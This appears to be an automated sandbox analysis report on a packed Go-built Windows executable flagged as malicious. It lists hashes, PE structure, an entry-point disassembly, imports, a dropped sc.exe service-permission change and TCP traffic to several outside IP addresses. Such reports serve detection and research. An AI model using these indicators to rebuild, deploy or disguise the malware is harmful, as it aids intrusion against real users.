                                                                    SHA1:AE0E12BC885CB5D4D26C49F6AE20ED40313EDF99
                                                                    SHA-256:FC8D064E05EBE37D661AECCB78F91085845E9E28CCFF1F9B08FD373830E38B7F
                                                                    SHA-512:03D1440B462B872B7AE4FCCBB455FC0C3AB4E9BF13D07726CE2A9FF9CE4A0E7632A45AF4B52265973D51C8C9D6E24CE84EF81FBAD23CDDF04B64F461FA55050D
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 41%
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........K............... ......p-...M...-...M...@...........................M...............................................M.....................................................................................................................UPX0.....p-.............................UPX1...... ...-... .................@...UPX2..........M....... .............@...3.95.UPX!....Y.P....dM... ...K.&'....... Go build ID: "8LgdNw10OMnjnEaf..o.ouob/F_u>d7bw5LzGyMt067q/f_4E....n-IIykrT4Xu-NukD/RUnzYH.IbGfj....1LuaRla". ...d...........;a.v ....'....D$...$...`..k..&...............f.......dnl.L$h......m..g$....4..$....,.....\H......1.1.TP....~..|.\Z.;cpu.u.d,.T.@.....iT=........H9.............Y...?.............l.....0.9....lX..?(.|$<).......!..}...$.T..$0............Z..\*f..on....m.......;5al..p7.......M..$.........L....A....9.}..w._.9.- .9....5...p........
                                                                    \Device\Null
                                                                    Process:C:\Windows\SysWOW64\sc.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):39
                                                                    Entropy (8bit):3.964228182058903
                                                                    Encrypted:false
                                                                    SSDEEP:3:fxjRCqjv:ZMc
                                                                    MD5:2F1A2A9AA9E93E390CC54C36BDB0561B
                                                                    SHA1:BC13C3DAE9A3C2A7E45F08F2EF1BB14893078EC7
                                                                    SHA-256:706A0C615566BE5CC8D24596CD765A00BE7D5E036CA006DFBD8DE7BC6F7FA719
                                                                    SHA-512:4204246AF86876511D1748734BADD3008297EBBFD2E306BC00AED13BD5F5B2A946A0C5A72F3988429A5A4F09B2BFC4E2406D07E87A6F8FDD90309B2C9CCF97FF
                                                                    Malicious:false
                                                                    Preview: [SC] SetServiceObjectSecurity SUCCESS..

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                    Entropy (8bit):6.3340959539901585
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • VXD Driver (31/22) 0.00%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:jkDmft1Qoe.exe
                                                                    File size:9054208
                                                                    MD5:099ad37ceccdfa74229d976b10973736
                                                                    SHA1:1b6d65319dcb21fa94310c04bc3abd89b90b4699
                                                                    SHA256:df84d3e83b4105f9178e518ca69e1a2ec3116d3223003857d892b8a6f64b05ba
                                                                    SHA512:5e40b33665e769eea3c506eb77f7790e11eaaf296402f7d78cd1644d434c88a593089c5349a6f894a9e6d24c96531b870d3f9bf72a021465a6d3fb52ba1fb9c2
                                                                    SSDEEP:98304:XYgmMiJdljVuezWku32WnMpP6KE1dj/DxMLgMhZytTVhg5iqR:XYgjiJR4MpP6KCxMLphwVhG
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........&................)...1...............X...@........................................................................

                                                                    File Icon

                                                                    Icon Hash:00828e8e8686b000

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x451610
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, RELOCS_STRIPPED
                                                                    DLL Characteristics:
                                                                    Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:6
                                                                    OS Version Minor:1
                                                                    File Version Major:6
                                                                    File Version Minor:1
                                                                    Subsystem Version Major:6
                                                                    Subsystem Version Minor:1
                                                                    Import Hash:1cd364a9e949d5ecebd6c614e64bc545

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    jmp 00007F8A94A15390h
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    mov ebx, dword ptr [esp+04h]
                                                                    mov dword ptr fs:[00000034h], 00000000h
                                                                    mov ebp, esp
                                                                    mov ecx, dword ptr [ebx+04h]
                                                                    mov eax, ecx
                                                                    shl eax, 02h
                                                                    sub esp, eax
                                                                    mov edi, esp
                                                                    mov esi, dword ptr [ebx+08h]
                                                                    cld
                                                                    rep movsd
                                                                    call dword ptr [ebx]
                                                                    mov esp, ebp
                                                                    mov ebx, dword ptr [esp+04h]
                                                                    mov dword ptr [ebx+0Ch], eax
                                                                    mov dword ptr [ebx+10h], edx
                                                                    mov eax, dword ptr fs:[00000034h]
                                                                    mov dword ptr [ebx+14h], eax
                                                                    ret
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    sub esp, 18h
                                                                    mov dword ptr [esp], FFFFFFF4h
                                                                    mov ebp, esp
                                                                    call dword ptr [0098A068h]
                                                                    mov esp, ebp
                                                                    mov dword ptr [esp], eax
                                                                    mov edx, 00CB8E00h
                                                                    mov dword ptr [esp+04h], edx
                                                                    mov edx, dword ptr [00CB8964h]
                                                                    mov dword ptr [esp+08h], edx
                                                                    lea edx, dword ptr [esp+14h]
                                                                    mov dword ptr [edx], 00000000h
                                                                    mov dword ptr [esp+0Ch], edx
                                                                    mov dword ptr [esp+10h], 00000000h
                                                                    call dword ptr [0098A020h]
                                                                    mov esi, ebp
                                                                    add esp, 18h
                                                                    ret
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    mov eax, dword ptr fs:[00000034h]
                                                                    mov dword ptr [esp+04h], eax
                                                                    ret
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    mov ecx, dword ptr [esp+04h]
                                                                    sub esp, 28h
                                                                    mov dword ptr [esp+1Ch], ebx
                                                                    mov dword ptr [esp+10h], ebp
                                                                    mov dword ptr [esp+14h], esi
                                                                    mov dword ptr [esp+18h], edi

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x8bd0000x330.idata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x58a0200x84.data
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x29d3450x29d400unknownunknownunknownunknownIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x29f0000x2ea8ab0x2eaa00unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0x58a0000x3320d80x31a000unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                    .idata0x8bd0000x3300x400False0.4326171875data4.12245366014IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                    .symtab0x8be0000x40x200False0.02734375data0.0203931352361IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Imports

                                                                    DLLImport
                                                                    kernel32.dllWriteFile, WriteConsoleW, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, SwitchToThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, LoadLibraryA, LoadLibraryW, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatus, GetProcessAffinityMask, GetProcAddress, GetEnvironmentStringsW, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler

                                                                    Network Behavior

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Oct 18, 2021 08:01:27.673686028 CEST49767443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:01:27.673742056 CEST44349767172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:01:27.673823118 CEST49767443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:01:27.675398111 CEST49767443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:01:27.675429106 CEST44349767172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:01:27.730365038 CEST44349767172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:01:27.730683088 CEST49767443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:01:27.730705023 CEST44349767172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:01:27.731502056 CEST49767443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:01:27.731508970 CEST44349767172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:01:27.732933044 CEST44349767172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:01:27.733004093 CEST49767443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:01:27.735019922 CEST49767443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:01:27.735142946 CEST44349767172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:01:27.735673904 CEST49767443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:01:27.735707045 CEST44349767172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:01:27.735985041 CEST49767443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:01:27.736027002 CEST49767443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:01:27.736043930 CEST44349767172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:01:27.736469030 CEST49767443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:01:27.736486912 CEST44349767172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:01:27.736773968 CEST49767443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:01:27.736788988 CEST44349767172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:01:27.736898899 CEST49767443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:01:27.736908913 CEST44349767172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:01:27.737030029 CEST49767443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:01:27.737040997 CEST44349767172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:01:33.487389088 CEST49768443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:01:33.487449884 CEST44349768172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:01:33.487576962 CEST49768443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:01:33.517617941 CEST49768443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:01:33.517647982 CEST44349768172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:01:33.554471970 CEST44349768172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:01:33.554789066 CEST49768443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:01:33.555773973 CEST49768443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:01:33.555809975 CEST44349768172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:01:33.557039022 CEST44349768172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:01:33.558536053 CEST49768443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:01:33.564076900 CEST49768443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:01:33.564106941 CEST49768443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:01:33.564126015 CEST44349768172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:01:33.564347982 CEST44349768172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:01:33.606337070 CEST49768443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:01:33.606364965 CEST44349768172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:01:33.656450033 CEST49768443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:01:45.302469969 CEST49769443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:01:45.302499056 CEST44349769104.21.79.9192.168.2.4
                                                                    Oct 18, 2021 08:01:45.302611113 CEST49769443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:01:45.303806067 CEST49769443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:01:45.303816080 CEST44349769104.21.79.9192.168.2.4
                                                                    Oct 18, 2021 08:01:45.341133118 CEST44349769104.21.79.9192.168.2.4
                                                                    Oct 18, 2021 08:01:45.341341972 CEST49769443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:01:45.342705011 CEST49769443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:01:45.342726946 CEST44349769104.21.79.9192.168.2.4
                                                                    Oct 18, 2021 08:01:45.344635963 CEST44349769104.21.79.9192.168.2.4
                                                                    Oct 18, 2021 08:01:45.344707966 CEST49769443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:01:45.348368883 CEST49769443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:01:45.348464012 CEST44349769104.21.79.9192.168.2.4
                                                                    Oct 18, 2021 08:01:45.348721027 CEST49769443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:01:45.392901897 CEST49769443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:01:45.392926931 CEST44349769104.21.79.9192.168.2.4
                                                                    Oct 18, 2021 08:01:45.445388079 CEST49769443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:01:57.751687050 CEST49767443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:01:57.751708031 CEST44349767172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:02:03.621248007 CEST49768443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:02:03.621263027 CEST44349768172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:02:15.400670052 CEST49769443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:02:15.400715113 CEST44349769104.21.79.9192.168.2.4
                                                                    Oct 18, 2021 08:02:17.978424072 CEST44349767172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:02:17.978668928 CEST44349767172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:02:17.978759050 CEST49767443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:02:17.979052067 CEST49767443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:02:17.979089022 CEST44349767172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:02:17.979105949 CEST49767443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:02:17.979152918 CEST44349767172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:02:21.835602045 CEST44349768172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:02:21.835856915 CEST44349768172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:02:21.835916996 CEST49768443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:02:21.836183071 CEST49768443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:02:21.836210966 CEST44349768172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:02:35.164239883 CEST44349769104.21.79.9192.168.2.4
                                                                    Oct 18, 2021 08:02:35.164356947 CEST44349769104.21.79.9192.168.2.4
                                                                    Oct 18, 2021 08:02:35.164427996 CEST49769443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:02:35.164875984 CEST49769443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:02:35.164892912 CEST44349769104.21.79.9192.168.2.4
                                                                    Oct 18, 2021 08:02:35.164958954 CEST49769443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:02:35.164968014 CEST44349769104.21.79.9192.168.2.4
                                                                    Oct 18, 2021 08:02:35.243710041 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.259744883 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.259849072 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.261605024 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.277569056 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.287981033 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.288007021 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.288022995 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.288041115 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.288058043 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.288084984 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.288090944 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.288100004 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.288113117 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.288130999 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.288144112 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.288214922 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.288294077 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.288865089 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.288887978 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.288902998 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.288921118 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.288933992 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.289105892 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.289697886 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.289748907 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.289767027 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.289792061 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.289796114 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.289833069 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.289944887 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.290081978 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.290673018 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.290693045 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.290704966 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.290718079 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.290827990 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.291251898 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.291631937 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.291671038 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.291702032 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.291752100 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.291779995 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.296773911 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.296801090 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.296896935 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.303951025 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.303976059 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.303991079 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.304007053 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.304034948 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.304107904 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.304281950 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.304302931 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.304322004 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.304333925 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.304353952 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.304445982 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.305227041 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.305279970 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.305293083 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.305305004 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.305316925 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.305474997 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.306188107 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.306206942 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.306221962 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.306233883 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.306395054 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.306992054 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.307009935 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.307022095 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.307035923 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.307051897 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.307097912 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.307166100 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.307914019 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.307935953 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.307955027 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.307971954 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.307987928 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.308017015 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.308084011 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.308826923 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.308845043 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.308861017 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.308876991 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.308892012 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.308924913 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.308981895 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.309786081 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.309804916 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.309818029 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.309834957 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.309849977 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.309895039 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.309952974 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.310724974 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.310739994 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.310751915 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.310843945 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.311312914 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.311330080 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.311352968 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.311357975 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.311371088 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.311482906 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.319962025 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.319987059 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.320009947 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.320030928 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.320049047 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.320097923 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.320180893 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.320457935 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.320493937 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.320516109 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.320540905 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.320564985 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.320597887 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.320681095 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.321271896 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.321300983 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.321329117 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.321355104 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.321378946 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.321381092 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.321460009 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.322195053 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.322218895 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.322236061 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.322248936 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.322319984 CEST4981680192.168.2.4172.67.196.11
